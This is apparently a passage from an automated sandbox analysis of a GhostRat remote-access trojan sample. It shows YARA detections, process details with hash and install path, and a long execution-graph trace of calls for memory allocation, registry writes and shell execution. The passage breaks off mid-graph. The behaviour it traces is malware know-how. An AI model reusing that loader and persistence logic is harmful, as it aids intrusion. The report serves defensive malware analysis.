                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        • Detection: 3%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:false

                                        Target ID:7
                                        Start time:12:31:43
                                        Start date:14/09/2024
                                        Path:C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                                        Imagebase:0x400000
                                        File size:6'453'568 bytes
                                        MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:12:31:51
                                        Start date:14/09/2024
                                        Path:C:\Program Files (x86)\IemFNe\Fj0RhXL.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                                        Imagebase:0x400000
                                        File size:6'453'568 bytes
                                        MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:7.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:12%
                                          Total number of Nodes:1789
                                          Total number of Limit Nodes:16
                                          execution_graph 18759 4290000 18761 4290005 18759->18761 18764 4290031 18761->18764 18776 4290b11 GetPEB 18764->18776 18767 4290b11 GetPEB 18768 42902a6 18767->18768 18769 429002c 18768->18769 18770 429049a GetNativeSystemInfo 18768->18770 18770->18769 18771 42904c7 VirtualAlloc 18770->18771 18772 42904e0 18771->18772 18778 1000bcc4 18772->18778 18777 429029a 18776->18777 18777->18767 18779 1000bcd4 18778->18779 18780 1000bccf 18778->18780 18893 1000bbce 18779->18893 18901 1001006c 18780->18901 18783 4290a47 18783->18769 18784 1000324b 18783->18784 18785 1000326a _memset __write_nolock 18784->18785 18786 100033d0 Sleep 18785->18786 18787 100034dc _memset 18786->18787 18788 100034f6 Sleep 18787->18788 18789 10003603 _memset 18788->18789 19459 1000b19b GetSystemTimeAsFileTime 18789->19459 18791 10003623 19461 1000b06c 18791->19461 18793 1000362a _memset 19464 1000b07e 18793->19464 18795 1000364e 18796 1000368a _memset 18795->18796 18797 1000b07e _rand 37 API calls 18795->18797 18798 100036e6 wsprintfA 18796->18798 18797->18795 18799 10003722 _memset 18798->18799 18800 1000374c Sleep 18799->18800 19467 1000c4a0 18800->19467 18803 1000378b _memset 18804 100037d2 wsprintfA 18803->18804 18805 10003813 _memset 18804->18805 18806 1000382b Sleep 18805->18806 18807 1000c4a0 _memset 18806->18807 18808 10003864 wsprintfA 18807->18808 18809 1000389c _memset 18808->18809 18810 100038b4 Sleep 18809->18810 18811 1000c4a0 _memset 18810->18811 18812 100038e8 wsprintfA 18811->18812 18813 10003920 _memset 18812->18813 19469 100028b9 18813->19469 18816 10003974 18817 100028b9 48 API calls 18816->18817 18818 10003992 Sleep 18817->18818 18818->18816 18819 100039a7 18818->18819 18820 100028b9 48 API calls 18819->18820 18821 100039c5 Sleep 18820->18821 18821->18819 18822 100039da 18821->18822 18823 1000b19b __time64 GetSystemTimeAsFileTime 18822->18823 18824 100039e0 18823->18824 18825 1000b06c 37 API calls 18824->18825 18826 100039e7 _memset 18825->18826 18827 1000b07e _rand 37 API calls 18826->18827 18828 10003a21 _memset 18826->18828 18827->18826 19477 1000518c 18828->19477 18830 10003ae1 19484 10005166 18830->19484 18833 1000518c 44 API calls 18834 10003b16 18833->18834 18835 1000518c 44 API calls 18834->18835 18836 10003b31 18835->18836 18837 1000518c 44 API calls 18836->18837 18838 10003b51 18837->18838 18839 1000518c 44 API calls 18838->18839 18840 10003b71 18839->18840 19487 10009824 18840->19487 18842 10003b85 19519 10002d6b CreateFileA GetFileSize 18842->19519 18844 10003ba2 Sleep Sleep 18845 10003bd6 _memset 18844->18845 19528 1000a77d 18845->19528 18847 10003bf3 _memset 19532 1000b0dd 18847->19532 18850 10003c75 19541 100018ea 18850->19541 18853 10003cab 18856 10003cb4 18853->18856 18857 10003e5c GlobalAddAtomA 18853->18857 18854 10003c7f 19705 10002388 18854->19705 19734 10002e12 VariantInit CoInitialize 18856->19734 18871 10003e83 18857->18871 18858 10003c8c Sleep 18859 10002388 67 API calls 18858->18859 18860 10003ca6 18859->18860 18861 10003e5b 18860->18861 18861->18857 18864 10003e04 Sleep 18866 10002e12 10 API calls 18864->18866 18865 10003e1b 19746 10002f95 18865->19746 18866->18865 18868 100043d6 Sleep Sleep 18868->18871 18869 10003e48 18869->18857 19754 10001144 18869->19754 18871->18868 19702 1000b46f 18871->19702 18873 100043f1 RegOpenKeyExA 18879 100042fe _memset 18873->18879 18874 10004455 Sleep 18874->18879 18889 100042fc 18874->18889 18875 10004421 RegSetValueExA RegCloseKey 18875->18879 18876 10002388 67 API calls 18876->18889 18877 1000432e LoadLibraryA 18877->18879 18878 1000437f GetProcAddress 18878->18868 18878->18879 18879->18874 18879->18875 18879->18877 18879->18878 18880 100043bc ShellExecuteA 18879->18880 18880->18868 18881 10003ec8 _memset 18882 1000a77d _mbstowcs 41 API calls 18881->18882 18883 1000416c _memset 18882->18883 18884 1000b0dd _strcat_s 37 API calls 18883->18884 18885 1000426b FindWindowExA 18884->18885 18885->18873 18886 10004288 18885->18886 19783 10001030 CoInitialize 18886->19783 18889->18876 18889->18879 18890 100042be CoCreateInstance 18891 100042e0 18890->18891 18892 100042f6 CoUninitialize 18890->18892 18891->18892 18892->18889 18894 1000bbda ___BuildCatchObjectHelper 18893->18894 18898 1000bc27 ___DllMainCRTStartup 18894->18898 18899 1000bc77 ___BuildCatchObjectHelper 18894->18899 18905 1000ba6a 18894->18905 18896 1000bc57 18897 1000ba6a __CRT_INIT@12 81 API calls 18896->18897 18896->18899 18897->18899 18898->18896 18898->18899 18900 1000ba6a __CRT_INIT@12 81 API calls 18898->18900 18899->18783 18900->18896 18902 10010091 18901->18902 18903 1001009e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 18901->18903 18902->18903 18904 10010095 18902->18904 18903->18904 18904->18779 18906 1000ba76 ___BuildCatchObjectHelper 18905->18906 18907 1000baf8 18906->18907 18908 1000ba7e 18906->18908 18910 1000bb59 18907->18910 18911 1000bafe 18907->18911 18957 1000e748 HeapCreate 18908->18957 18912 1000bbb7 18910->18912 18913 1000bb5e 18910->18913 18917 1000bb1c 18911->18917 18923 1000ba87 ___BuildCatchObjectHelper 18911->18923 19046 1000b49b 18911->19046 18912->18923 19078 1000e312 18912->19078 19054 1000e02b TlsGetValue 18913->19054 18914 1000ba83 18916 1000ba8e 18914->18916 18914->18923 18958 1000e380 GetModuleHandleW 18916->18958 18922 1000bb30 18917->18922 18926 1000fae7 __ioterm 38 API calls 18917->18926 19050 1000bb43 18922->19050 18923->18898 18925 1000ba93 __RTC_Initialize 18929 1000ba97 18925->18929 18936 1000baa3 GetCommandLineA 18925->18936 18930 1000bb26 18926->18930 18977 1000e766 HeapDestroy 18929->18977 18933 1000e05f __mtterm 39 API calls 18930->18933 18931 1000bb7b RtlDecodePointer 18937 1000bb90 18931->18937 18935 1000bb2b 18933->18935 18934 1000ba9c 18934->18923 19049 1000e766 HeapDestroy 18935->19049 18978 1000fe6b GetEnvironmentStringsW 18936->18978 18940 1000bb94 18937->18940 18941 1000bbab 18937->18941 19061 1000e09c 18940->19061 19072 1000ac51 18941->19072 18946 1000bb9b GetCurrentThreadId 18946->18923 18948 1000bac1 19001 1000e05f 18948->19001 18952 1000bae1 18952->18934 19041 1000fae7 18952->19041 18957->18914 18959 1000e394 18958->18959 18962 1000e39d TlsAlloc 18958->18962 18960 1000e05f __mtterm 39 API calls 18959->18960 18961 1000e399 18960->18961 18961->18925 18964 1000e435 18962->18964 18965 1000e4f6 18962->18965 18964->18965 19084 1000b241 18964->19084 18965->18925 18969 1000e4f1 18970 1000e05f __mtterm 39 API calls 18969->18970 18970->18965 18972 1000f808 __calloc_crt Sleep 18973 1000e4b9 18972->18973 18973->18969 18974 1000e4d6 18973->18974 18975 1000e09c __getptd_noexit 37 API calls 18974->18975 18976 1000e4de GetCurrentThreadId 18975->18976 18976->18965 18977->18934 18979 1000bab3 18978->18979 18981 1000fe87 18978->18981 18988 1000f8a2 GetStartupInfoW 18979->18988 18980 1000fef4 FreeEnvironmentStringsW 18980->18979 18981->18980 19095 1000f7c3 18981->19095 18984 1000feca 18985 1000fee8 FreeEnvironmentStringsW 18984->18985 18986 1000ac51 _free 37 API calls 18984->18986 18985->18979 18987 1000fee4 18986->18987 18987->18985 18989 1000f808 __calloc_crt Sleep 18988->18989 18998 1000f8c0 18989->18998 18990 1000fa6b GetStdHandle 18995 1000fa35 18990->18995 18991 1000f808 __calloc_crt Sleep 18991->18998 18992 1000facf SetHandleCount 19000 1000babd 18992->19000 18993 1000fa7d GetFileType 18993->18995 18994 1000f9b5 18994->18995 18996 1000f9e1 GetFileType 18994->18996 18997 1000f9ec InitializeCriticalSectionAndSpinCount 18994->18997 18995->18990 18995->18992 18995->18993 18999 1000faa3 InitializeCriticalSectionAndSpinCount 18995->18999 18996->18994 18996->18997 18997->18994 18997->19000 18998->18991 18998->18994 18998->18995 18998->19000 18999->18995 18999->19000 19000->18948 19008 1000fdb0 19000->19008 19002 1000e069 RtlDecodePointer 19001->19002 19003 1000e078 19001->19003 19002->19003 19004 1000e089 TlsFree 19003->19004 19005 1000e097 19003->19005 19004->19005 19006 1000ac51 _free 37 API calls 19005->19006 19007 1000ee96 19005->19007 19006->19005 19007->18929 19009 1000fdc5 19008->19009 19010 1000fdca GetModuleFileNameA 19008->19010 19219 1000dcc2 19009->19219 19012 1000fdf1 19010->19012 19223 1000fc16 19012->19223 19014 1000bacd 19014->18952 19019 1000fb3a 19014->19019 19016 1000f7c3 __malloc_crt 37 API calls 19017 1000fe33 19016->19017 19017->19014 19018 1000fc16 _parse_cmdline 39 API calls 19017->19018 19018->19014 19020 1000fb43 19019->19020 19023 1000fb48 _strlen 19019->19023 19021 1000dcc2 ___initmbctable 48 API calls 19020->19021 19021->19023 19022 1000f808 __calloc_crt Sleep 19029 1000fb7d _strlen 19022->19029 19023->19022 19026 1000bad6 19023->19026 19024 1000fbcc 19025 1000ac51 _free 37 API calls 19024->19025 19025->19026 19026->18952 19035 1000b298 19026->19035 19027 1000f808 __calloc_crt Sleep 19027->19029 19028 1000fbf2 19030 1000ac51 _free 37 API calls 19028->19030 19029->19024 19029->19026 19029->19027 19029->19028 19032 1000fc09 19029->19032 19365 1000e5d6 19029->19365 19030->19026 19033 1000d50f __invoke_watson 10 API calls 19032->19033 19034 1000fc15 19033->19034 19037 1000b2a6 __IsNonwritableInCurrentImage 19035->19037 19383 1000f2c9 19037->19383 19038 1000b2c4 __initterm_e 19040 1000b2e5 __IsNonwritableInCurrentImage 19038->19040 19386 1000c403 19038->19386 19040->18952 19045 1000faf0 19041->19045 19042 1000fb37 19042->18948 19043 1000ac51 _free 37 API calls 19043->19045 19044 1000fb09 RtlDeleteCriticalSection 19044->19045 19045->19042 19045->19043 19045->19044 19428 1000b32f 19046->19428 19048 1000b4a6 19048->18917 19049->18922 19051 1000bb56 19050->19051 19052 1000bb48 19050->19052 19051->18923 19052->19051 19053 1000e05f __mtterm 39 API calls 19052->19053 19053->19051 19055 1000e040 RtlDecodePointer TlsSetValue 19054->19055 19056 1000bb63 19054->19056 19055->19056 19057 1000f808 19056->19057 19060 1000f811 19057->19060 19058 1000bb6f 19058->18923 19058->18931 19059 1000f82f Sleep 19059->19060 19060->19058 19060->19059 19450 1000ec50 19061->19450 19063 1000e0a8 GetModuleHandleW 19064 1000ef92 __lock 35 API calls 19063->19064 19065 1000e0e6 InterlockedIncrement 19064->19065 19451 1000e13e 19065->19451 19068 1000ef92 __lock 35 API calls 19069 1000e107 ___addlocaleref 19068->19069 19454 1000e147 19069->19454 19071 1000e132 ___BuildCatchObjectHelper 19071->18946 19073 1000ac85 _free 19072->19073 19074 1000ac5c HeapFree 19072->19074 19073->18934 19074->19073 19075 1000ac71 19074->19075 19076 1000d5b3 __lseeki64_nolock 35 API calls 19075->19076 19077 1000ac77 GetLastError 19076->19077 19077->19073 19079 1000e363 19078->19079 19083 1000e320 RtlDecodePointer 19078->19083 19080 1000e375 TlsSetValue 19079->19080 19081 1000e37e 19079->19081 19080->19081 19081->18923 19083->19079 19093 1000e019 RtlEncodePointer 19084->19093 19086 1000b249 __init_pointers __initp_misc_winsig 19094 1000f049 RtlEncodePointer 19086->19094 19088 1000b26f 19089 1000ee18 19088->19089 19090 1000ee23 19089->19090 19091 1000ee2d InitializeCriticalSectionAndSpinCount 19090->19091 19092 1000e48a 19090->19092 19091->19090 19091->19092 19092->18969 19092->18972 19093->19086 19094->19088 19097 1000f7cc 19095->19097 19098 1000f802 19097->19098 19099 1000f7e3 Sleep 19097->19099 19100 1000ac8b 19097->19100 19098->18980 19098->18984 19099->19097 19101 1000ad08 19100->19101 19108 1000ac99 19100->19108 19102 1000e997 _malloc RtlDecodePointer 19101->19102 19103 1000ad0e 19102->19103 19105 1000d5b3 __lseeki64_nolock 36 API calls 19103->19105 19116 1000ad00 19105->19116 19106 1000acc7 RtlAllocateHeap 19106->19108 19106->19116 19108->19106 19109 1000acf4 19108->19109 19113 1000acf2 19108->19113 19114 1000aca4 19108->19114 19153 1000e997 RtlDecodePointer 19108->19153 19155 1000d5b3 19109->19155 19115 1000d5b3 __lseeki64_nolock 36 API calls 19113->19115 19114->19108 19117 1000e94f 19114->19117 19126 1000e7a0 19114->19126 19150 1000b217 19114->19150 19115->19116 19116->19097 19158 100134fc 19117->19158 19119 1000e956 19121 100134fc __NMSG_WRITE 37 API calls 19119->19121 19124 1000e963 19119->19124 19120 1000e7a0 __NMSG_WRITE 37 API calls 19122 1000e97b 19120->19122 19121->19124 19123 1000e7a0 __NMSG_WRITE 37 API calls 19122->19123 19125 1000e985 19123->19125 19124->19120 19124->19125 19125->19114 19127 1000e7c1 __NMSG_WRITE 19126->19127 19128 100134fc __NMSG_WRITE 34 API calls 19127->19128 19149 1000e8dd 19127->19149 19130 1000e7db 19128->19130 19132 1000e8ec GetStdHandle 19130->19132 19133 100134fc __NMSG_WRITE 34 API calls 19130->19133 19131 1000e94d 19131->19114 19136 1000e8fa _strlen 19132->19136 19132->19149 19134 1000e7ec 19133->19134 19134->19132 19135 1000e7fe 19134->19135 19135->19149 19165 10013499 19135->19165 19139 1000e930 WriteFile 19136->19139 19136->19149 19139->19149 19140 1000e82a GetModuleFileNameW 19141 1000e84b 19140->19141 19144 1000e857 _wcslen 19140->19144 19143 10013499 __NMSG_WRITE 34 API calls 19141->19143 19143->19144 19146 1001333c 34 API calls __NMSG_WRITE 19144->19146 19147 1000e8cd 19144->19147 19174 1000d50f 19144->19174 19177 100133b1 19144->19177 19146->19144 19186 100131d0 19147->19186 19193 1000a501 19149->19193 19201 1000b1ec GetModuleHandleW 19150->19201 19154 1000e9ac 19153->19154 19154->19108 19204 1000e150 GetLastError 19155->19204 19157 1000d5b8 19157->19113 19159 10013508 19158->19159 19160 10013512 19159->19160 19161 1000d5b3 __lseeki64_nolock 37 API calls 19159->19161 19160->19119 19162 1001352b 19161->19162 19163 1000d561 __output_l 11 API calls 19162->19163 19164 10013536 19163->19164 19164->19119 19166 100134a7 19165->19166 19167 100134ae 19165->19167 19166->19167 19172 100134cf 19166->19172 19168 1000d5b3 __lseeki64_nolock 37 API calls 19167->19168 19169 100134b3 19168->19169 19170 1000d561 __output_l 11 API calls 19169->19170 19171 1000e81f 19170->19171 19171->19140 19171->19144 19172->19171 19173 1000d5b3 __lseeki64_nolock 37 API calls 19172->19173 19173->19169 19175 1000d3e6 __call_reportfault 8 API calls 19174->19175 19176 1000d521 GetCurrentProcess TerminateProcess 19175->19176 19176->19144 19178 100133c3 19177->19178 19180 100133cc 19178->19180 19182 100133c7 19178->19182 19184 1001340a 19178->19184 19179 1000d5b3 __lseeki64_nolock 37 API calls 19181 100133e3 19179->19181 19180->19144 19183 1000d561 __output_l 11 API calls 19181->19183 19182->19179 19182->19180 19183->19180 19184->19180 19185 1000d5b3 __lseeki64_nolock 37 API calls 19184->19185 19185->19181 19187 1000e019 __init_pointers RtlEncodePointer 19186->19187 19188 100131f6 19187->19188 19189 10013206 LoadLibraryW 19188->19189 19190 1001321b 19188->19190 19189->19190 19191 1000a501 __call_reportfault 5 API calls 19190->19191 19192 1001333a 19191->19192 19192->19149 19194 1000a509 19193->19194 19195 1000a50b IsDebuggerPresent 19193->19195 19194->19131 19197 10011bae __call_reportfault 19195->19197 19198 1000c5e7 SetUnhandledExceptionFilter UnhandledExceptionFilter 19197->19198 19199 1000c60c GetCurrentProcess TerminateProcess 19198->19199 19200 1000c604 __call_reportfault 19198->19200 19199->19131 19200->19199 19202 1000b200 GetProcAddress 19201->19202 19203 1000b210 ExitProcess 19201->19203 19202->19203 19205 1000e02b ___set_flsgetvalue TlsGetValue RtlDecodePointer TlsSetValue 19204->19205 19206 1000e167 19205->19206 19207 1000e1bd SetLastError 19206->19207 19208 1000e16f 19206->19208 19207->19157 19209 1000f808 __calloc_crt Sleep 19208->19209 19210 1000e17b 19209->19210 19210->19207 19211 1000e183 RtlDecodePointer 19210->19211 19212 1000e198 19211->19212 19213 1000e1b4 19212->19213 19214 1000e19c 19212->19214 19216 1000ac51 _free 33 API calls 19213->19216 19215 1000e09c __getptd_noexit 33 API calls 19214->19215 19217 1000e1a4 GetCurrentThreadId 19215->19217 19218 1000e1ba 19216->19218 19217->19207 19218->19207 19220 1000dccb 19219->19220 19221 1000dcd2 19219->19221 19229 1000db28 19220->19229 19221->19010 19225 1000fc35 19223->19225 19227 1000fca2 19225->19227 19359 100138a6 19225->19359 19226 1000fda0 19226->19014 19226->19016 19227->19226 19228 100138a6 39 API calls _parse_cmdline 19227->19228 19228->19227 19230 1000db34 ___BuildCatchObjectHelper 19229->19230 19257 1000e1c9 19230->19257 19234 1000db47 19278 1000d8c3 19234->19278 19237 1000f7c3 __malloc_crt 37 API calls 19238 1000db68 19237->19238 19239 1000dc87 ___BuildCatchObjectHelper 19238->19239 19285 1000d93f 19238->19285 19239->19221 19242 1000dc94 19242->19239 19245 1000dca7 19242->19245 19248 1000ac51 _free 37 API calls 19242->19248 19243 1000db98 InterlockedDecrement 19244 1000dba8 19243->19244 19249 1000dbb8 19243->19249 19246 1000ac51 _free 37 API calls 19244->19246 19244->19249 19247 1000d5b3 __lseeki64_nolock 37 API calls 19245->19247 19246->19249 19247->19239 19248->19245 19249->19239 19295 1000ef92 19249->19295 19252 1000dbe3 InterlockedDecrement 19253 1000dc71 19252->19253 19254 1000dc5f 19252->19254 19302 1000dc89 19253->19302 19254->19253 19255 1000ac51 _free 37 API calls 19254->19255 19255->19253 19258 1000e150 __getptd_noexit 37 API calls 19257->19258 19259 1000e1d1 19258->19259 19260 1000db3d 19259->19260 19305 1000b4aa 19259->19305 19262 1000d81f 19260->19262 19263 1000d82b ___BuildCatchObjectHelper 19262->19263 19264 1000e1c9 __getptd 37 API calls 19263->19264 19265 1000d830 19264->19265 19266 1000ef92 __lock 37 API calls 19265->19266 19267 1000d842 19265->19267 19268 1000d860 19266->19268 19270 1000d850 ___BuildCatchObjectHelper 19267->19270 19274 1000b4aa __amsg_exit 37 API calls 19267->19274 19269 1000d8a9 19268->19269 19271 1000d891 InterlockedIncrement 19268->19271 19272 1000d877 InterlockedDecrement 19268->19272 19312 1000d8ba 19269->19312 19270->19234 19271->19269 19272->19271 19275 1000d882 19272->19275 19274->19270 19275->19271 19276 1000ac51 _free 37 API calls 19275->19276 19277 1000d890 19276->19277 19277->19271 19315 1000a594 19278->19315 19281 1000d900 19283 1000d905 GetACP 19281->19283 19284 1000d8f2 19281->19284 19282 1000d8e2 GetOEMCP 19282->19284 19283->19284 19284->19237 19284->19239 19286 1000d8c3 getSystemCP 41 API calls 19285->19286 19287 1000d95f 19286->19287 19288 1000d96a setSBCS 19287->19288 19291 1000d9ae IsValidCodePage 19287->19291 19294 1000d9d3 _memset __setmbcp_nolock 19287->19294 19289 1000a501 __call_reportfault 5 API calls 19288->19289 19290 1000db26 19289->19290 19290->19242 19290->19243 19291->19288 19292 1000d9c0 GetCPInfo 19291->19292 19292->19288 19292->19294 19323 1000d68f GetCPInfo 19294->19323 19296 1000efa7 19295->19296 19297 1000efba RtlEnterCriticalSection 19295->19297 19333 1000eed0 19296->19333 19297->19252 19299 1000efad 19299->19297 19300 1000b4aa __amsg_exit 36 API calls 19299->19300 19301 1000efb9 19300->19301 19301->19297 19358 1000eeb9 RtlLeaveCriticalSection 19302->19358 19304 1000dc90 19304->19239 19306 1000e94f __FF_MSGBANNER 37 API calls 19305->19306 19307 1000b4b4 19306->19307 19308 1000e7a0 __NMSG_WRITE 37 API calls 19307->19308 19309 1000b4bc 19308->19309 19310 1000b485 _abort 37 API calls 19309->19310 19311 1000b4c7 19310->19311 19313 1000eeb9 _doexit RtlLeaveCriticalSection 19312->19313 19314 1000d8c1 19313->19314 19314->19267 19316 1000a5a7 19315->19316 19320 1000a5f4 19315->19320 19317 1000e1c9 __getptd 37 API calls 19316->19317 19318 1000a5ac 19317->19318 19319 1000a5d4 19318->19319 19321 1000dfa0 _LocaleUpdate::_LocaleUpdate 37 API calls 19318->19321 19319->19320 19322 1000d81f _LocaleUpdate::_LocaleUpdate 39 API calls 19319->19322 19320->19281 19320->19282 19321->19319 19322->19320 19324 1000d6c3 _memset 19323->19324 19332 1000d777 19323->19332 19325 100128ac ___crtGetStringTypeA 40 API calls 19324->19325 19326 1000d732 19325->19326 19327 1000f6c5 ___crtLCMapStringA 40 API calls 19326->19327 19329 1000d752 19327->19329 19328 1000a501 __call_reportfault 5 API calls 19330 1000d81d 19328->19330 19331 1000f6c5 ___crtLCMapStringA 40 API calls 19329->19331 19330->19294 19331->19332 19332->19328 19334 1000eedc ___BuildCatchObjectHelper 19333->19334 19335 1000ef02 19334->19335 19336 1000e94f __FF_MSGBANNER 36 API calls 19334->19336 19338 1000f7c3 __malloc_crt 36 API calls 19335->19338 19341 1000ef12 ___BuildCatchObjectHelper 19335->19341 19337 1000eef1 19336->19337 19339 1000e7a0 __NMSG_WRITE 36 API calls 19337->19339 19340 1000ef1d 19338->19340 19342 1000eef8 19339->19342 19343 1000ef33 19340->19343 19344 1000ef24 19340->19344 19341->19299 19347 1000b217 _malloc GetModuleHandleW GetProcAddress ExitProcess 19342->19347 19346 1000ef92 __lock 36 API calls 19343->19346 19345 1000d5b3 __lseeki64_nolock 36 API calls 19344->19345 19345->19341 19348 1000ef3a 19346->19348 19347->19335 19349 1000ef42 InitializeCriticalSectionAndSpinCount 19348->19349 19350 1000ef6d 19348->19350 19351 1000ef52 19349->19351 19352 1000ef5e 19349->19352 19353 1000ac51 _free 36 API calls 19350->19353 19354 1000ac51 _free 36 API calls 19351->19354 19355 1000ef89 __mtinitlocknum RtlLeaveCriticalSection 19352->19355 19353->19352 19356 1000ef58 19354->19356 19355->19341 19357 1000d5b3 __lseeki64_nolock 36 API calls 19356->19357 19357->19352 19358->19304 19362 10013853 19359->19362 19363 1000a594 _LocaleUpdate::_LocaleUpdate 39 API calls 19362->19363 19364 10013866 19363->19364 19364->19225 19366 1000e5eb 19365->19366 19367 1000e5e4 19365->19367 19368 1000d5b3 __lseeki64_nolock 37 API calls 19366->19368 19367->19366 19371 1000e609 19367->19371 19369 1000e5f0 19368->19369 19374 1000d561 19369->19374 19372 1000e5fa 19371->19372 19373 1000d5b3 __lseeki64_nolock 37 API calls 19371->19373 19372->19029 19373->19369 19377 1000d534 RtlDecodePointer 19374->19377 19378 1000d549 19377->19378 19379 1000d50f __invoke_watson 10 API calls 19378->19379 19380 1000d560 19379->19380 19381 1000d534 __output_l 10 API calls 19380->19381 19382 1000d56d 19381->19382 19382->19372 19384 1000f2cf RtlEncodePointer 19383->19384 19384->19384 19385 1000f2e9 19384->19385 19385->19038 19389 1000c3c7 19386->19389 19388 1000c410 19388->19040 19390 1000c3d3 ___BuildCatchObjectHelper 19389->19390 19397 1000b22f 19390->19397 19396 1000c3f4 ___BuildCatchObjectHelper 19396->19388 19398 1000ef92 __lock 37 API calls 19397->19398 19399 1000b236 19398->19399 19400 1000c2e0 19399->19400 19401 1000c2f7 19400->19401 19403 1000c372 19401->19403 19413 10010fcc 19401->19413 19410 1000c3fd 19403->19410 19404 1000c344 19404->19403 19407 1000f854 __realloc_crt 41 API calls 19404->19407 19409 1000c360 RtlEncodePointer 19404->19409 19405 1000c320 19405->19403 19405->19404 19420 1000f854 19405->19420 19408 1000c35a 19407->19408 19408->19403 19408->19409 19409->19403 19425 1000b238 19410->19425 19414 10010fd7 19413->19414 19415 10010fec RtlSizeHeap 19413->19415 19416 1000d5b3 __lseeki64_nolock 37 API calls 19414->19416 19415->19405 19417 10010fdc 19416->19417 19418 1000d561 __output_l 11 API calls 19417->19418 19419 10010fe7 19418->19419 19419->19405 19422 1000f85d 19420->19422 19421 100137a6 __realloc_crt 40 API calls 19421->19422 19422->19421 19423 1000f89c 19422->19423 19424 1000f87d Sleep 19422->19424 19423->19404 19424->19422 19426 1000eeb9 _doexit RtlLeaveCriticalSection 19425->19426 19427 1000b23f 19426->19427 19427->19396 19429 1000b33b ___BuildCatchObjectHelper 19428->19429 19430 1000ef92 __lock 37 API calls 19429->19430 19431 1000b342 19430->19431 19435 1000b3ec 19431->19435 19441 1000e019 RtlEncodePointer __init_pointers 19431->19441 19434 1000b469 ___BuildCatchObjectHelper 19434->19048 19443 1000b45a 19435->19443 19437 1000b451 19438 1000b217 _malloc 3 API calls 19437->19438 19439 1000b45a 19438->19439 19440 1000b467 19439->19440 19448 1000eeb9 RtlLeaveCriticalSection 19439->19448 19440->19048 19441->19431 19444 1000b460 19443->19444 19445 1000b43a 19443->19445 19449 1000eeb9 RtlLeaveCriticalSection 19444->19449 19445->19434 19447 1000eeb9 RtlLeaveCriticalSection 19445->19447 19447->19437 19448->19440 19449->19445 19450->19063 19457 1000eeb9 RtlLeaveCriticalSection 19451->19457 19453 1000e100 19453->19068 19458 1000eeb9 RtlLeaveCriticalSection 19454->19458 19456 1000e14e 19456->19071 19457->19453 19458->19456 19460 1000b1cb __aulldiv 19459->19460 19460->18791 19462 1000e1c9 __getptd 37 API calls 19461->19462 19463 1000b076 19462->19463 19463->18793 19465 1000e1c9 __getptd 37 API calls 19464->19465 19466 1000b083 19465->19466 19466->18795 19468 10003766 wsprintfA 19467->19468 19468->18803 19472 100028c6 _memset __write_nolock 19469->19472 19470 1000a501 __call_reportfault 5 API calls 19471 10002a5e Sleep 19470->19471 19471->18813 19471->18816 19476 10002a36 19472->19476 19794 1000a25f 19472->19794 19474 10002b07 _memset 19475 10002bae CreateFileA WriteFile FlushFileBuffers CloseHandle 19474->19475 19474->19476 19475->19476 19476->19470 19478 100051a4 19477->19478 19479 100051d4 19478->19479 19481 100051bb 19478->19481 19839 1000539c 19479->19839 19828 1000522d 19481->19828 19483 100051d2 19483->18830 19485 1000522d 44 API calls 19484->19485 19486 10003afb 19485->19486 19486->18833 19488 10009833 __EH_prolog3_GS 19487->19488 19890 10009c60 19488->19890 19490 10009872 19897 10008ddd 19490->19897 19492 10009892 19493 100098a0 wsprintfA 19492->19493 19494 100098ce 19492->19494 19498 10009bed OutputDebugStringA 19493->19498 19495 100098e5 19494->19495 19907 10008352 19494->19907 19501 10009bc1 19495->19501 19502 10009903 19495->19502 19513 10009c0d 19498->19513 19959 1000972c 19501->19959 19949 10008ef0 19502->19949 19506 10009909 wsprintfA 19506->19498 19509 10008e86 50 API calls 19512 10009930 ctype 19509->19512 19511 10009bb7 19514 1000a1f1 std::_Xinvalid_argument 38 API calls 19511->19514 19512->19495 19512->19509 19512->19511 19515 10009ce1 44 